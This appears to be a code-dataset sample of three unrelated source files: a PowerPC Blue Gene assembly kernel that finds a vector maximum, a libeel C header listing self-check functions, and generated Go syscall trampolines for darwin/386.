/* AUSTIN ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, */
/* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF */
/* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE */
/* DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF TEXAS AT */
/* AUSTIN OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, */
/* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES */
/* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE */
/* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR */
/* BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF */
/* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT */
/* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT */
/* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE */
/* POSSIBILITY OF SUCH DAMAGE. */
/* */
/* The views and conclusions contained in the software and */
/* documentation are those of the authors and should not be */
/* interpreted as representing official policies, either expressed */
/* or implied, of The University of Texas at Austin. */
/*********************************************************************/
#define ASSEMBLER
#include "common.h"

/* ------------------------------------------------------------------
 * Strided-vector FP reduction kernel for PowerPC 440 FP2 ("Double
 * Hummer") paired floating point (Blue Gene).  C prototype roughly:
 *
 *     FLOAT kernel(BLASLONG n, FLOAT *x, BLASLONG incx)
 *
 * With the operand order used here, fsel/fpsel keep the old value
 * when (old - new) >= 0, so the LARGER element survives each step,
 * i.e. this computes the maximum of x.  No fabs is taken, so it is
 * not an AMAX/AMIN kernel.
 * NOTE(review): the exported entry name comes from PROLOGUE in
 * common.h; confirm against the build which of the MIN/MAX family
 * this file is compiled as.
 * ------------------------------------------------------------------ */

/* Integer arguments (PPC ABI: r3, r4, r5 carry the first int args). */
#define N r3     /* element count */
#define X r4     /* vector pointer */
#define INCX r5  /* stride in elements; scaled to bytes below */

#define INCX2 r6 /* 2 * INCX in bytes: advance of one paired load */
#define X2 r7    /* declared but unused in this kernel */

/* Running partial results (4 pair registers = 8 scalar lanes).
   C1 aliases f1, the FP return register. */
#define C1 f1
#define C2 f0
#define C3 f2
#define C4 f3

/* Input data registers for the unrolled loops. */
#define A1 f4
#define A2 f5
#define A3 f6
#define A4 f7
#define A5 f8
#define A6 f9
#define A7 f10
#define A8 f11

/* Differences C - A, used as the selector operand of fsel/fpsel. */
#define F1 f12
#define F2 f13
#define F3 f14
#define F4 f15
#define F5 f16
#define F6 f17
#define F7 f18
#define F8 f19

/* T1-T8 are defined for symmetry with sibling kernels; unused here,
   but they alias callee-saved f20-f27, which is why those registers
   are saved below together with f14-f19 (used as F3-F8). */
#define T1 f20
#define T2 f21
#define T3 f22
#define T4 f23
#define T5 f24
#define T6 f25
#define T7 f26
#define T8 f27

	PROLOGUE
	PROFCODE

	/* Save callee-saved FP pair registers f14-f27: stfpdux
	   pre-decrements SP by 16 and stores the full 16-byte pair. */
	li	r10, -16
	stfpdux	f14, SP, r10
	stfpdux	f15, SP, r10
	stfpdux	f16, SP, r10
	stfpdux	f17, SP, r10
	stfpdux	f18, SP, r10
	stfpdux	f19, SP, r10
	stfpdux	f20, SP, r10
	stfpdux	f21, SP, r10
	stfpdux	f22, SP, r10
	stfpdux	f23, SP, r10
	stfpdux	f24, SP, r10
	stfpdux	f25, SP, r10
	stfpdux	f26, SP, r10
	stfpdux	f27, SP, r10

	/* Push a zeroed 16-byte scratch block; it is read back right
	   below (lfpdx with r10 == 0) to zero-clear C1. */
	li	r10, 0
	stwu	r10, -4(SP)
	stwu	r10, -4(SP)
	stwu	r10, -4(SP)
	stwu	r10, -4(SP)

#ifdef F_INTERFACE
	/* Fortran interface passes N and INCX by reference. */
	LDINT	N, 0(N)
	LDINT	INCX, 0(INCX)
#endif

	lfpdx	C1, SP, r10 # Zero clear

	/* Scale strides to bytes: INCX = incx * sizeof(FLOAT);
	   INCX2 = 2 * INCX, the step of one paired (2-element) load. */
	slwi	INCX, INCX, BASE_SHIFT
	add	INCX2, INCX, INCX

	/* Degenerate cases n <= 0 or incx <= 0: return the zero in C1. */
	cmpwi	cr0, N, 0
	ble	LL(999)
	cmpwi	cr0, INCX, 0
	ble	LL(999)

	/* Seed the reduction with x[0] and consume that element. */
	LFD	C1, 0 * SIZE(X)
	add	X, X, INCX
	addi	N, N, -1
	cmpwi	cr0, N, 0
	ble	LL(999)	# single element: x[0] already sits in f1

	/* Replicate the seed into both halves of C1 and into all four
	   accumulators: 8 identical partial lanes. */
	fsmfp	C1, C1
	fpmr	C2, C1
	fpmr	C3, C1
	fpmr	C4, C1

	/* Unit stride takes the paired-load fast path; anything else
	   goes to the generic strided path at LL(100). */
	cmpwi	cr0, INCX, SIZE
	bne	LL(100)

	/* Paired loads need 2*SIZE alignment: if X is misaligned, peel
	   one scalar element (folded into lane C2) to align it. */
	andi.	r0, X, 2 * SIZE - 1
	beq	LL(05)

	LFD	C2, 0 * SIZE(X)
	add	X, X, INCX
	addi	N, N, -1
	cmpwi	cr0, N, 0
	ble	LL(998)
	.align 4

LL(05):
	/* Bias X down by one pair: LFPDUX pre-increments before loading. */
	sub	X, X, INCX2
	/* CTR = N / 16; the main loop consumes 16 elements (8 pairs)
	   per iteration. */
	srawi.	r0, N, 4
	mtspr	CTR, r0
	beq-	LL(15)

	/* Prime the software pipeline with the first 8 pairs. */
	LFPDUX	A1, X, INCX2
	LFPDUX	A2, X, INCX2
	LFPDUX	A3, X, INCX2
	LFPDUX	A4, X, INCX2
	LFPDUX	A5, X, INCX2
	LFPDUX	A6, X, INCX2
	LFPDUX	A7, X, INCX2
	LFPDUX	A8, X, INCX2
	bdz	LL(13)
	.align 4

LL(12):
	/* Steady state: select over the previous 16 elements while the
	   next 16 load.  fpsub Fi = Ci - Ai; fpsel keeps Ci when the
	   difference is >= 0, so the larger value survives per lane. */
	fpsub	F1, C1, A1
	fpsub	F2, C2, A2
	fpsub	F3, C3, A3
	fpsub	F4, C4, A4

	fpsel	C1, F1, C1, A1
	LFPDUX	A1, X, INCX2
	fpsel	C2, F2, C2, A2
	LFPDUX	A2, X, INCX2
	fpsel	C3, F3, C3, A3
	LFPDUX	A3, X, INCX2
	fpsel	C4, F4, C4, A4
	LFPDUX	A4, X, INCX2

	fpsub	F5, C1, A5
	fpsub	F6, C2, A6
	fpsub	F7, C3, A7
	fpsub	F8, C4, A8

	fpsel	C1, F5, C1, A5
	LFPDUX	A5, X, INCX2
	fpsel	C2, F6, C2, A6
	LFPDUX	A6, X, INCX2
	fpsel	C3, F7, C3, A7
	LFPDUX	A7, X, INCX2
	fpsel	C4, F8, C4, A8
	LFPDUX	A8, X, INCX2
	bdnz	LL(12)
	.align 4

LL(13):
	/* Pipeline drain: fold the final 16 pre-loaded elements. */
	fpsub	F1, C1, A1
	fpsub	F2, C2, A2
	fpsub	F3, C3, A3
	fpsub	F4, C4, A4

	fpsel	C1, F1, C1, A1
	fpsel	C2, F2, C2, A2
	fpsel	C3, F3, C3, A3
	fpsel	C4, F4, C4, A4

	fpsub	F5, C1, A5
	fpsub	F6, C2, A6
	fpsub	F7, C3, A7
	fpsub	F8, C4, A8

	fpsel	C1, F5, C1, A5
	fpsel	C2, F6, C2, A6
	fpsel	C3, F7, C3, A7
	fpsel	C4, F8, C4, A8
	.align 4

LL(15):
	/* Tail: handle N mod 16 leftovers in chunks of 8, 4, 2, 1. */
	andi.	r0, N, 15
	beq	LL(998)

	andi.	r0, N, 8
	beq	LL(16)

	LFPDUX	A1, X, INCX2
	LFPDUX	A2, X, INCX2
	LFPDUX	A3, X, INCX2
	LFPDUX	A4, X, INCX2

	fpsub	F1, C1, A1
	fpsub	F2, C2, A2
	fpsub	F3, C3, A3
	fpsub	F4, C4, A4

	fpsel	C1, F1, C1, A1
	fpsel	C2, F2, C2, A2
	fpsel	C3, F3, C3, A3
	fpsel	C4, F4, C4, A4
	.align 4

LL(16):
	andi.	r0, N, 4
	beq	LL(17)

	LFPDUX	A1, X, INCX2
	LFPDUX	A2, X, INCX2

	fpsub	F1, C1, A1
	fpsub	F2, C2, A2
	fpsel	C1, F1, C1, A1
	fpsel	C2, F2, C2, A2
	.align 4

LL(17):
	andi.	r0, N, 2
	beq	LL(18)

	LFPDUX	A1, X, INCX2
	fpsub	F1, C1, A1
	fpsel	C1, F1, C1, A1
	.align 4

LL(18):
	/* Odd final element: scalar compare on the primary half only. */
	andi.	r0, N, 1
	beq	LL(998)

	LFDUX	A1, X, INCX2
	fsub	F1, C1, A1
	fsel	C1, F1, C1, A1
	b	LL(998)
	.align 4

LL(100):
	/* -------- general-stride path --------
	   Each pair register is filled with two strided elements:
	   primary half via LFDUX, secondary half via LFSDUX. */
	sub	X, X, INCX	# bias: LFDUX pre-increments
	srawi.	r0, N, 4	# CTR = N / 16
	mtspr	CTR, r0
	beq-	LL(105)

	/* Prime the pipeline: 16 strided elements into A1-A8. */
	LFDUX	A1, X, INCX
	LFDUX	A2, X, INCX
	LFDUX	A3, X, INCX
	LFDUX	A4, X, INCX

	LFSDUX	A1, X, INCX
	LFSDUX	A2, X, INCX
	LFSDUX	A3, X, INCX
	LFSDUX	A4, X, INCX

	LFDUX	A5, X, INCX
	LFDUX	A6, X, INCX
	LFDUX	A7, X, INCX
	LFDUX	A8, X, INCX

	LFSDUX	A5, X, INCX
	LFSDUX	A6, X, INCX
	LFSDUX	A7, X, INCX
	LFSDUX	A8, X, INCX

	fpsub	F1, C1, A1
	fpsub	F2, C2, A2
	fpsub	F3, C3, A3
	fpsub	F4, C4, A4
	bdz	LL(103)
	.align 4

LL(102):
	/* Steady state, loads interleaved with the compare/selects. */
	fpsel	C1, F1, C1, A1
	LFDUX	A1, X, INCX
	fpsel	C2, F2, C2, A2
	LFDUX	A2, X, INCX
	fpsel	C3, F3, C3, A3
	LFDUX	A3, X, INCX
	fpsel	C4, F4, C4, A4
	LFDUX	A4, X, INCX

	fpsub	F5, C1, A5
	LFSDUX	A1, X, INCX
	fpsub	F6, C2, A6
	LFSDUX	A2, X, INCX
	fpsub	F7, C3, A7
	LFSDUX	A3, X, INCX
	fpsub	F8, C4, A8
	LFSDUX	A4, X, INCX

	fpsel	C1, F5, C1, A5
	LFDUX	A5, X, INCX
	fpsel	C2, F6, C2, A6
	LFDUX	A6, X, INCX
	fpsel	C3, F7, C3, A7
	LFDUX	A7, X, INCX
	fpsel	C4, F8, C4, A8
	LFDUX	A8, X, INCX

	fpsub	F1, C1, A1
	LFSDUX	A5, X, INCX
	fpsub	F2, C2, A2
	LFSDUX	A6, X, INCX
	fpsub	F3, C3, A3
	LFSDUX	A7, X, INCX
	fpsub	F4, C4, A4
	LFSDUX	A8, X, INCX
	bdnz	LL(102)
	.align 4

LL(103):
	/* Pipeline drain for the strided loop. */
	fpsel	C1, F1, C1, A1
	fpsel	C2, F2, C2, A2
	fpsel	C3, F3, C3, A3
	fpsel	C4, F4, C4, A4

	fpsub	F5, C1, A5
	fpsub	F6, C2, A6
	fpsub	F7, C3, A7
	fpsub	F8, C4, A8

	fpsel	C1, F5, C1, A5
	fpsel	C2, F6, C2, A6
	fpsel	C3, F7, C3, A7
	fpsel	C4, F8, C4, A8
	.align 4

LL(105):
	/* Strided tail: N mod 16 leftovers in chunks of 8, 4, 2, 1. */
	andi.	r0, N, 15
	beq	LL(998)

	andi.	r0, N, 8
	beq	LL(106)

	LFDUX	A1, X, INCX
	LFDUX	A2, X, INCX
	LFDUX	A3, X, INCX
	LFDUX	A4, X, INCX

	LFSDUX	A1, X, INCX
	LFSDUX	A2, X, INCX
	LFSDUX	A3, X, INCX
	LFSDUX	A4, X, INCX

	fpsub	F1, C1, A1
	fpsub	F2, C2, A2
	fpsub	F3, C3, A3
	fpsub	F4, C4, A4

	fpsel	C1, F1, C1, A1
	fpsel	C2, F2, C2, A2
	fpsel	C3, F3, C3, A3
	fpsel	C4, F4, C4, A4
	.align 4

LL(106):
	/* 4 leftovers: only primary halves are loaded, so the scalar
	   fsub/fsel forms are used from here on. */
	andi.	r0, N, 4
	beq	LL(107)

	LFDUX	A1, X, INCX
	LFDUX	A2, X, INCX
	LFDUX	A3, X, INCX
	LFDUX	A4, X, INCX

	fsub	F1, C1, A1
	fsub	F2, C2, A2
	fsub	F3, C3, A3
	fsub	F4, C4, A4

	fsel	C1, F1, C1, A1
	fsel	C2, F2, C2, A2
	fsel	C3, F3, C3, A3
	fsel	C4, F4, C4, A4
	.align 4

LL(107):
	andi.	r0, N, 2
	beq	LL(108)

	LFDUX	A1, X, INCX
	LFDUX	A2, X, INCX
	fsub	F1, C1, A1
	fsub	F2, C2, A2
	fsel	C1, F1, C1, A1
	fsel	C2, F2, C2, A2
	.align 4

LL(108):
	andi.	r0, N, 1
	beq	LL(998)

	LFDUX	A1, X, INCX
	fsub	F1, C1, A1
	fsel	C1, F1, C1, A1
	.align 4

LL(998):
	/* Reduce the 8 partial lanes to one scalar:
	   C1 := sel(C1,C2); C3 := sel(C3,C4); C1 := sel(C1,C3);
	   then fold the two halves of the C1 pair (fsmtp copies the
	   secondary half of C1 into the primary half of C2). */
	fpsub	F1, C1, C2
	fpsub	F2, C3, C4

	fpsel	C1, F1, C1, C2
	fpsel	C3, F2, C3, C4

	fpsub	F1, C1, C3
	fpsel	C1, F1, C1, C3

	fsmtp	C2, C1
	fsub	F1, C1, C2
	fsel	C1, F1, C1, C2	# final result in f1 (FP return reg)
	.align 4

LL(999):
	/* Restore f14-f27 (lfpdux pre-increments SP by 16; the first
	   increment also steps over the 16-byte zero scratch block),
	   then pop the last frame slot and return. */
	li	r10, 16
	lfpdux	f27, SP, r10
	lfpdux	f26, SP, r10
	lfpdux	f25, SP, r10
	lfpdux	f24, SP, r10
	lfpdux	f23, SP, r10
	lfpdux	f22, SP, r10
	lfpdux	f21, SP, r10
	lfpdux	f20, SP, r10
	lfpdux	f19, SP, r10
	lfpdux	f18, SP, r10
	lfpdux	f17, SP, r10
	lfpdux	f16, SP, r10
	lfpdux	f15, SP, r10
	lfpdux	f14, SP, r10
	addi	SP, SP, 16
	blr
	EPILOGUE
| {
"language": "Assembly"
} |
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 8; tab-width: 8 -*-
eel-lib-self-check-functions.h: Wrapper and prototypes for all
self-check functions in libeel.
Copyright (C) 2000 Eazel, Inc.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU Library General Public License as
published by the Free Software Foundation; either version 2 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Library General Public License for more details.
You should have received a copy of the GNU Library General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
Boston, MA 02110-1301, USA.
Author: Darin Adler <[email protected]>
*/
#ifndef __EEL_LIB_SELF_CHECK_FUNCTIONS_H__
#define __EEL_LIB_SELF_CHECK_FUNCTIONS_H__

#include "eel-self-checks.h"

/* Run every self-check function registered in the
   EEL_LIB_FOR_EACH_SELF_CHECK_FUNCTION list below. */
void eel_run_lib_self_checks (void);

/* Putting the prototypes for these self-check functions in each
   header file for the files they are defined in would make compiling
   the self-check framework take way too long (since one file would
   have to include everything).

   So we put the list of functions here instead.

   Instead of just putting prototypes here, we put this macro that
   can be used to do operations on the whole list of functions.
*/

/* X-macro list: expands `macro' once per self-check function.  Each
   entry keeps a trailing backslash so a new entry can be appended
   directly above the closing comment line. */
#define EEL_LIB_FOR_EACH_SELF_CHECK_FUNCTION(macro) \
	macro (eel_self_check_background) \
	macro (eel_self_check_gdk_extensions) \
	macro (eel_self_check_glib_extensions) \
	macro (eel_self_check_string) \
/* Add new self-check functions to the list above this line. */

/* Generate prototypes for all the functions. */
EEL_LIB_FOR_EACH_SELF_CHECK_FUNCTION (EEL_SELF_CHECK_FUNCTION_PROTOTYPE)

#endif /* __EEL_LIB_SELF_CHECK_FUNCTIONS_H__ */
| {
"language": "Assembly"
} |
// go run mkasm_darwin.go 386
// Code generated by the command above; DO NOT EDIT.
// +build go1.12
#include "textflag.h"
TEXT ·libc_getgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgroups(SB)
TEXT ·libc_setgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgroups(SB)
TEXT ·libc_wait4_trampoline(SB),NOSPLIT,$0-0
JMP libc_wait4(SB)
TEXT ·libc_accept_trampoline(SB),NOSPLIT,$0-0
JMP libc_accept(SB)
TEXT ·libc_bind_trampoline(SB),NOSPLIT,$0-0
JMP libc_bind(SB)
TEXT ·libc_connect_trampoline(SB),NOSPLIT,$0-0
JMP libc_connect(SB)
TEXT ·libc_socket_trampoline(SB),NOSPLIT,$0-0
JMP libc_socket(SB)
TEXT ·libc_getsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockopt(SB)
TEXT ·libc_setsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsockopt(SB)
TEXT ·libc_getpeername_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpeername(SB)
TEXT ·libc_getsockname_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockname(SB)
TEXT ·libc_shutdown_trampoline(SB),NOSPLIT,$0-0
JMP libc_shutdown(SB)
TEXT ·libc_socketpair_trampoline(SB),NOSPLIT,$0-0
JMP libc_socketpair(SB)
TEXT ·libc_recvfrom_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvfrom(SB)
TEXT ·libc_sendto_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendto(SB)
TEXT ·libc_recvmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvmsg(SB)
TEXT ·libc_sendmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendmsg(SB)
TEXT ·libc_kevent_trampoline(SB),NOSPLIT,$0-0
JMP libc_kevent(SB)
TEXT ·libc___sysctl_trampoline(SB),NOSPLIT,$0-0
JMP libc___sysctl(SB)
TEXT ·libc_utimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_utimes(SB)
TEXT ·libc_futimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_futimes(SB)
TEXT ·libc_fcntl_trampoline(SB),NOSPLIT,$0-0
JMP libc_fcntl(SB)
TEXT ·libc_poll_trampoline(SB),NOSPLIT,$0-0
JMP libc_poll(SB)
TEXT ·libc_madvise_trampoline(SB),NOSPLIT,$0-0
JMP libc_madvise(SB)
TEXT ·libc_mlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlock(SB)
TEXT ·libc_mlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlockall(SB)
TEXT ·libc_mprotect_trampoline(SB),NOSPLIT,$0-0
JMP libc_mprotect(SB)
TEXT ·libc_msync_trampoline(SB),NOSPLIT,$0-0
JMP libc_msync(SB)
TEXT ·libc_munlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlock(SB)
TEXT ·libc_munlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlockall(SB)
TEXT ·libc_ptrace_trampoline(SB),NOSPLIT,$0-0
JMP libc_ptrace(SB)
TEXT ·libc_getattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_getattrlist(SB)
TEXT ·libc_pipe_trampoline(SB),NOSPLIT,$0-0
JMP libc_pipe(SB)
TEXT ·libc_getxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_getxattr(SB)
TEXT ·libc_fgetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fgetxattr(SB)
TEXT ·libc_setxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_setxattr(SB)
TEXT ·libc_fsetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsetxattr(SB)
TEXT ·libc_removexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_removexattr(SB)
TEXT ·libc_fremovexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fremovexattr(SB)
TEXT ·libc_listxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_listxattr(SB)
TEXT ·libc_flistxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_flistxattr(SB)
TEXT ·libc_setattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_setattrlist(SB)
TEXT ·libc_kill_trampoline(SB),NOSPLIT,$0-0
JMP libc_kill(SB)
TEXT ·libc_ioctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_ioctl(SB)
TEXT ·libc_sendfile_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendfile(SB)
TEXT ·libc_access_trampoline(SB),NOSPLIT,$0-0
JMP libc_access(SB)
TEXT ·libc_adjtime_trampoline(SB),NOSPLIT,$0-0
JMP libc_adjtime(SB)
TEXT ·libc_chdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_chdir(SB)
TEXT ·libc_chflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_chflags(SB)
TEXT ·libc_chmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_chmod(SB)
TEXT ·libc_chown_trampoline(SB),NOSPLIT,$0-0
JMP libc_chown(SB)
TEXT ·libc_chroot_trampoline(SB),NOSPLIT,$0-0
JMP libc_chroot(SB)
TEXT ·libc_close_trampoline(SB),NOSPLIT,$0-0
JMP libc_close(SB)
TEXT ·libc_dup_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup(SB)
TEXT ·libc_dup2_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup2(SB)
TEXT ·libc_exchangedata_trampoline(SB),NOSPLIT,$0-0
JMP libc_exchangedata(SB)
TEXT ·libc_exit_trampoline(SB),NOSPLIT,$0-0
JMP libc_exit(SB)
TEXT ·libc_faccessat_trampoline(SB),NOSPLIT,$0-0
JMP libc_faccessat(SB)
TEXT ·libc_fchdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchdir(SB)
TEXT ·libc_fchflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchflags(SB)
TEXT ·libc_fchmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmod(SB)
TEXT ·libc_fchmodat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmodat(SB)
TEXT ·libc_fchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchown(SB)
TEXT ·libc_fchownat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchownat(SB)
TEXT ·libc_flock_trampoline(SB),NOSPLIT,$0-0
JMP libc_flock(SB)
TEXT ·libc_fpathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_fpathconf(SB)
TEXT ·libc_fsync_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsync(SB)
TEXT ·libc_ftruncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_ftruncate(SB)
TEXT ·libc_getdtablesize_trampoline(SB),NOSPLIT,$0-0
JMP libc_getdtablesize(SB)
TEXT ·libc_getegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getegid(SB)
TEXT ·libc_geteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_geteuid(SB)
TEXT ·libc_getgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgid(SB)
TEXT ·libc_getpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgid(SB)
TEXT ·libc_getpgrp_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgrp(SB)
TEXT ·libc_getpid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpid(SB)
TEXT ·libc_getppid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getppid(SB)
TEXT ·libc_getpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpriority(SB)
TEXT ·libc_getrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrlimit(SB)
TEXT ·libc_getrusage_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrusage(SB)
TEXT ·libc_getsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsid(SB)
TEXT ·libc_getuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getuid(SB)
TEXT ·libc_issetugid_trampoline(SB),NOSPLIT,$0-0
JMP libc_issetugid(SB)
TEXT ·libc_kqueue_trampoline(SB),NOSPLIT,$0-0
JMP libc_kqueue(SB)
TEXT ·libc_lchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_lchown(SB)
TEXT ·libc_link_trampoline(SB),NOSPLIT,$0-0
JMP libc_link(SB)
TEXT ·libc_linkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_linkat(SB)
TEXT ·libc_listen_trampoline(SB),NOSPLIT,$0-0
JMP libc_listen(SB)
TEXT ·libc_mkdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdir(SB)
TEXT ·libc_mkdirat_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdirat(SB)
TEXT ·libc_mkfifo_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkfifo(SB)
TEXT ·libc_mknod_trampoline(SB),NOSPLIT,$0-0
JMP libc_mknod(SB)
TEXT ·libc_open_trampoline(SB),NOSPLIT,$0-0
JMP libc_open(SB)
TEXT ·libc_openat_trampoline(SB),NOSPLIT,$0-0
JMP libc_openat(SB)
TEXT ·libc_pathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_pathconf(SB)
TEXT ·libc_pread_trampoline(SB),NOSPLIT,$0-0
JMP libc_pread(SB)
TEXT ·libc_pwrite_trampoline(SB),NOSPLIT,$0-0
JMP libc_pwrite(SB)
TEXT ·libc_read_trampoline(SB),NOSPLIT,$0-0
JMP libc_read(SB)
TEXT ·libc_readlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlink(SB)
TEXT ·libc_readlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlinkat(SB)
TEXT ·libc_rename_trampoline(SB),NOSPLIT,$0-0
JMP libc_rename(SB)
TEXT ·libc_renameat_trampoline(SB),NOSPLIT,$0-0
JMP libc_renameat(SB)
TEXT ·libc_revoke_trampoline(SB),NOSPLIT,$0-0
JMP libc_revoke(SB)
TEXT ·libc_rmdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_rmdir(SB)
TEXT ·libc_lseek_trampoline(SB),NOSPLIT,$0-0
JMP libc_lseek(SB)
TEXT ·libc_select_trampoline(SB),NOSPLIT,$0-0
JMP libc_select(SB)
TEXT ·libc_setegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setegid(SB)
TEXT ·libc_seteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_seteuid(SB)
TEXT ·libc_setgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgid(SB)
TEXT ·libc_setlogin_trampoline(SB),NOSPLIT,$0-0
JMP libc_setlogin(SB)
TEXT ·libc_setpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpgid(SB)
TEXT ·libc_setpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpriority(SB)
TEXT ·libc_setprivexec_trampoline(SB),NOSPLIT,$0-0
JMP libc_setprivexec(SB)
TEXT ·libc_setregid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setregid(SB)
TEXT ·libc_setreuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setreuid(SB)
TEXT ·libc_setrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_setrlimit(SB)
TEXT ·libc_setsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsid(SB)
TEXT ·libc_settimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_settimeofday(SB)
TEXT ·libc_setuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setuid(SB)
TEXT ·libc_symlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlink(SB)
TEXT ·libc_symlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlinkat(SB)
TEXT ·libc_sync_trampoline(SB),NOSPLIT,$0-0
JMP libc_sync(SB)
TEXT ·libc_truncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_truncate(SB)
TEXT ·libc_umask_trampoline(SB),NOSPLIT,$0-0
JMP libc_umask(SB)
TEXT ·libc_undelete_trampoline(SB),NOSPLIT,$0-0
JMP libc_undelete(SB)
TEXT ·libc_unlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlink(SB)
TEXT ·libc_unlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlinkat(SB)
TEXT ·libc_unmount_trampoline(SB),NOSPLIT,$0-0
JMP libc_unmount(SB)
TEXT ·libc_write_trampoline(SB),NOSPLIT,$0-0
JMP libc_write(SB)
TEXT ·libc_mmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_mmap(SB)
TEXT ·libc_munmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_munmap(SB)
TEXT ·libc_gettimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_gettimeofday(SB)
TEXT ·libc_fstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstat64(SB)
TEXT ·libc_fstatat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatat64(SB)
TEXT ·libc_fstatfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatfs64(SB)
TEXT ·libc___getdirentries64_trampoline(SB),NOSPLIT,$0-0
JMP libc___getdirentries64(SB)
TEXT ·libc_getfsstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_getfsstat64(SB)
TEXT ·libc_lstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_lstat64(SB)
TEXT ·libc_stat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_stat64(SB)
